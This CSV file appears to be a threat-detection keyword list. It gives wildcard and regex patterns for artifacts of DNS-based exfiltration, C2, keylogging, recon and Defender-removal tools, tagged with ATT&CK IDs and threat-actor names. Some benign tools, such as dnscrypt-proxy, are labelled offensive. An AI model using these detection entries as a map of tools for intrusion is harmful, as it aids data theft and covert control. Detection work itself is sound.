"*dnscrypt-proxy-freebsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41241"
"*dnscrypt-proxy-linux_arm-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_arm\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41242"
"*dnscrypt-proxy-linux_arm64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_arm64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41243"
"*dnscrypt-proxy-linux_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41244"
"*dnscrypt-proxy-linux_mips-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41245"
"*dnscrypt-proxy-linux_mips64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41246"
"*dnscrypt-proxy-linux_mips64le-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips64le\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41247"
"*dnscrypt-proxy-linux_mipsle-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mipsle\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41248"
"*dnscrypt-proxy-linux_riscv64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_riscv64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41249"
"*dnscrypt-proxy-linux_x86_64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_x86_64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41250"
"*dnscrypt-proxy-macos_arm64-*.zip*",".{0,1000}dnscrypt\-proxy\-macos_arm64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41251"
"*dnscrypt-proxy-macos_x86_64-*.zip*",".{0,1000}dnscrypt\-proxy\-macos_x86_64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41252"
"*dnscrypt-proxy-master*",".{0,1000}dnscrypt\-proxy\-master.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41253"
"*dnscrypt-proxy-netbsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-netbsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41254"
"*dnscrypt-proxy-netbsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-netbsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41255"
"*dnscrypt-proxy-openbsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-openbsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41256"
"*dnscrypt-proxy-openbsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-openbsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41257"
"*dnscrypt-proxy-solaris_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-solaris_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41258"
"*dnscrypt-proxy-win32-*.zip*",".{0,1000}dnscrypt\-proxy\-win32\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41259"
"*dnscrypt-proxy-win64-*.zip*",".{0,1000}dnscrypt\-proxy\-win64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41260"
"*DNS-Enum-*-*.log*",".{0,1000}DNS\-Enum\-.{0,1000}\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","41261"
"*dnsenum.pl*",".{0,1000}dnsenum\.pl.{0,1000}","offensive_tool_keyword","dnsenum","multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.","T1218 - T1018 - T1190 - T1590 - T1012","TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/fwaeytens/dnsenum","1","1","#linux","N/A","N/A","7","634","139","2019-10-08T19:58:40Z","2014-01-10T14:47:09Z","41262"
"*dnsExfiltrator.exe*",".{0,1000}dnsExfiltrator\.exe.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","41263"
"*DNSExfiltratorLib*",".{0,1000}DNSExfiltratorLib.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","41264"
"*dnskire ALL=(ALL:ALL) NOPASSWD: ALL*",".{0,1000}dnskire\sALL\=\(ALL\:ALL\)\sNOPASSWD\:\sALL.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41265"
"*dnskire may*(ALL : ALL) NOPASSWD: ALL**",".{0,1000}dnskire\smay.{0,1000}\(ALL\s\:\sALL\)\sNOPASSWD\:\sALL.{0,1000}.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41266"
"*dnsKIRE started!\n*",".{0,1000}dnsKIRE\sstarted!\\n.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41267"
"*dnskire-install*",".{0,1000}dnskire\-install.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41268"
"*DNSListener.py*",".{0,1000}DNSListener\.py.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","41269"
"*dnslog--airvent.txt*",".{0,1000}dnslog\-\-airvent\.txt.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","41270"
"*dnslytics-get-rootdomains*",".{0,1000}dnslytics\-get\-rootdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","41271"
"*dnsmastermind.rb*",".{0,1000}dnsmastermind\.rb.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41272"
"*dnsmorph*",".{0,1000}dnsmorph.{0,1000}","offensive_tool_keyword","dnsmorph","DNSMORPH is a domain name permutation engine. inspired by dnstwist. It is written in Go making for a compact and very fast tool. It robustly handles any domain or subdomain supplied and provides a number of configuration options to tune permutation runs.","T1568.002 - T1568.003 - T1568.001 - T1568.004","TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/netevert/dnsmorph","1","1","N/A","N/A","N/A","3","266","43","2023-08-08T06:38:59Z","2018-02-20T19:13:35Z","41273"
"*dnspayload.bin*",".{0,1000}dnspayload\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","41274"
"*DNS-Persist.git*",".{0,1000}DNS\-Persist\.git.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","41275"
"*dnspot-agent-cli-*",".{0,1000}dnspot\-agent\-cli\-.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","41276"
"*dnspot-server-cli-*",".{0,1000}dnspot\-server\-cli\-.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","41277"
"*dnspot-server-tui-*",".{0,1000}dnspot\-server\-tui\-.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","41278"
"*dnsproxy start scripts*",".{0,1000}dnsproxy\sstart\sscripts.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41279"
"*dnsrecon -*",".{0,1000}dnsrecon\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","41280"
"*dnsrecon*",".{0,1000}dnsrecon.{0,1000}","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/darkoperator/dnsrecon","1","1","#linux","N/A","6","10","2755","556","2025-04-18T05:31:08Z","2010-12-16T03:25:49Z","41281"
"*dnsrecon-zonetransfer*",".{0,1000}dnsrecon\-zonetransfer.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","41282"
"*DnsSpoof.ps1*",".{0,1000}DnsSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","41283"
"*DNSStager payloads Available*",".{0,1000}DNSStager\spayloads\sAvailable.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","41284"
"*DNSStager will *",".{0,1000}DNSStager\swill\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","41285"
"*dnsteal.git*",".{0,1000}dnsteal\.git.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","3","10","1694","231","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z","41286"
"*dnsteal.py*",".{0,1000}dnsteal\.py.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","3","10","1694","231","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z","41287"
"*dnsteal-master*",".{0,1000}dnsteal\-master.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","3","10","1694","231","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z","41288"
"*dnstracer*",".{0,1000}dnstracer.{0,1000}","offensive_tool_keyword","DNSTracer","This is a python application that traces how a DNS query is performed from a client machine to the server.","T1556 - T1016 - T1046","TA0007 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/pcoder/DNSTracer","1","0","N/A","N/A","3","1","6","1","2011-11-11T22:06:48Z","2011-07-07T18:36:07Z","41289"
"*DNS-Tunnel-Keylogger*",".{0,1000}DNS\-Tunnel\-Keylogger.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","1","N/A","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","41290"
"*dnstwist*",".{0,1000}dnstwist.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","41291"
"*dnsx -silent -d * -w dns_worldlist.txt*",".{0,1000}dnsx\s\-silent\s\-d\s.{0,1000}\s\-w\sdns_worldlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41292"
"*dnsx -silent -d domains.txt -w jira*grafana*jenkins*",".{0,1000}dnsx\s\-silent\s\-d\sdomains\.txt\s\-w\sjira.{0,1000}grafana.{0,1000}jenkins.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41293"
"*do PowerRun cmd.exe*smartscreen.dll*",".{0,1000}do\sPowerRun\scmd\.exe.{0,1000}smartscreen\.dll.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","41294"
"*Do you want Ghauri set it for you ? [Y/n]*",".{0,1000}Do\syou\swant\sGhauri\sset\sit\sfor\syou\s\?\s\[Y\/n\].{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","41295"
